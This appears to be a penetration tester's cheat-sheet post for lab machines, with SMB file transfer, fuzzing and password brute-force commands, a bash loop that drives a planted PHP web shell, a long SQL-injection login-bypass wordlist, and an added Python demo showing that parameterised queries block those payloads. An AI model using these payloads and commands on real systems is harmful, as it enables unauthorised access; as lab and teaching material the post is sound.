Miscellaneous

Here I’ll show some examples of miscellaneous tools and commands that I commonly use.

Summary

File Transfer

Commands used to transfer files between boxes.

Windows File Transfer

You can transfer files using an SMB share served by impacket and mounted from PowerShell, and then easily get and send files to and from the remote server.

On Windows Box

$pass = convertto-securestring '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('0x4rt3mis', $pass)

On Kali Box we start the impacket smb server

impacket-smbserver kalishare . -username 0x4rt3mis -password 123456

Now we enable the samba share on Windows

New-PSDrive kalishare -PSProvider FileSystem -Credential $cred -Root \\10.10.16.5\kalishare

Or

net use \\10.10.16.5\kalishare /u:0x4rt3mis 123456
cp archive.zip \\10.10.16.5\kalishare

Commands

Let’s jump in.

Powershell

Get the size of folders

Get-ChildItem -Recurse 'C:\inetpub\wwwroot' | Measure-Object -Property Length -Sum

Zip Folder

Compress-Archive -Path .\htdocs -DestinationPath archive.zip

Port Scan

8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("ip",$_)) "Port $_ is open!"} 2>$null

Gobuster

gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30

Wfuzz

Login Bypass

wfuzz -z file,list.txt -d "username=adminFUZZ&password=admin" --hc 200 http://10.10.10.185/login.php

Vhost Fuzzing

wfuzz -u http://10.10.10.208 -H "Host: FUZZ.crossfit.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 10701

Password Bruteforce

wfuzz -c -z file,common.txt --hh 18170 -d "Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeOffset=240&User=root@localhost&Password=FUZZ" http://192.168.8.9/admin.php

Bash Misc

Find

find . -type f -newermt 2018-12-19 ! -newermt 2018-12-21 -ls

Grep Awesome

grep -l -R -e "\$_GET\['doc'\]" $(grep -l -R -e "\$_GET\['app'\]" `grep -l -R -e vqmods`)

Small ssh key

ssh-keygen -t ed25519 -f 0x4rt3mis

Pseudo WebShell PHP

#!/bin/bash
# 0x4rt3mis
# "Pseudo" shell - compromised HackTheBox machine

echo "exit for exit"
input=""
while [ "$input" != "exit" ]
do
    echo -n "> "
    read -r input
    # -G sends the URL-encoded data as a GET query string
    curl -G http://10.10.10.207/shop/vqmod/xml/payload.php --data-urlencode "cmd=$input"
done

Python Virtual Env

virtualenv -p python2.7 exploit
cd exploit
source bin/activate

Wordlist Auth Bypass

" "
" #
" --
"&"
"*"
"-"
"/*
"^"
'
' #
' '
' -
' --
'#
'&'
'*'
'-'
'--
'/*
'^'
=
==
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1?) and '1?='1-
admin" #
admin" --
admin"/*
admin' #
admin' --
admin'/*
admin' and substring(password/text(),1,1)='7
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1-
' and 1='1
' and a='a
' and 'one'='one
' and 'one'='one-
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
 or 0=0 #
 or 0=0 -
 or 0=0 --
" or 0=0 #
" or 0=0 -
" or 0=0 --
%' or '0'='0
' or         0=0 #
' or 0=0 #
' or 0=0 -
' or 0=0 --
 or 1=1
 or 1=1#
 or 1=1-
 or 1=1--
 or 1=1/*
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 -
" or 1=1 --
" or 1=1#
" or 1=1-
" or 1=1--
" or 1=1/*
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1?='1
' or 1=1
' or 1=1 -
' or 1=1 --
' or 1=1#
' or 1=1-
' or 1=1--
' or 1=1/*
' or 1=1;#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1?
) or '1?='1-
) or ('1?='1-
or 1=1
or 1=1#
or 1=1--
or 1=1/*
'OR 1=1--
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
" or "a"="a
") or ("a"="a
' or 'a'='a
' or a=a-
' or a=a--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
'OR '' = '	Allows authentication without a valid username.
'=' 'or' and '=' 'or'
' or 'one'='one
' or 'one'='one-
 or true
" or true--
") or true--
' or true--
') or true--
or true--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
' UNION select table_schema,table_name FROM information_Schema.tables;#
<username>'--
<username>' OR 1=1--
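As an added example (not part of the original post), the following shows why entries from the wordlist above work against a login check that builds its SQL by string concatenation, and why the same entries are harmless against a parameterised query. It uses an in-memory SQLite database with a constructed user table; the user, password and payload sample are assumptions for the demonstration.

```python
"""Added example: wordlist payloads vs. concatenated and parameterised SQL."""
import hashlib
import sqlite3

# Constructed sample data. MD5 is used only because the UNION payloads in the
# wordlist assume MD5-stored passwords; a real application needs a slow hash.
USERS = [("admin", hashlib.md5(b"s3cret").hexdigest())]


def make_db():
    """Build the in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by concatenation: user input is parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + pw_hash + "'")
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        # An unbalanced quote raises a syntax error; worth logging in practice.
        return False


def login_safe(conn, username, password):
    """Same check with bound parameters: input is only ever a string value."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


def run_wordlist(conn, payloads, check):
    """Return the payloads (sent as the username, with a wrong password)
    that the given login check accepts."""
    return [p for p in payloads if check(conn, p, "wrong-password")]


# A few entries taken from the wordlist above, plus a plain username.
SAMPLE_PAYLOADS = ["admin' or '1'='1", "admin' --", "' or 1=1--", "admin"]

if __name__ == "__main__":
    db = make_db()
    print("accepted by concatenation:", run_wordlist(db, SAMPLE_PAYLOADS, login_vulnerable))
    print("accepted by parameters:   ", run_wordlist(db, SAMPLE_PAYLOADS, login_safe))
```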

Apt Proxy

ssh -g -D 8000 kali@127.0.0.1
echo "Acquire::http::proxy \"socks5h://server:8000\";" > /etc/apt/apt.conf

This post is licensed under CC BY 4.0 by the author.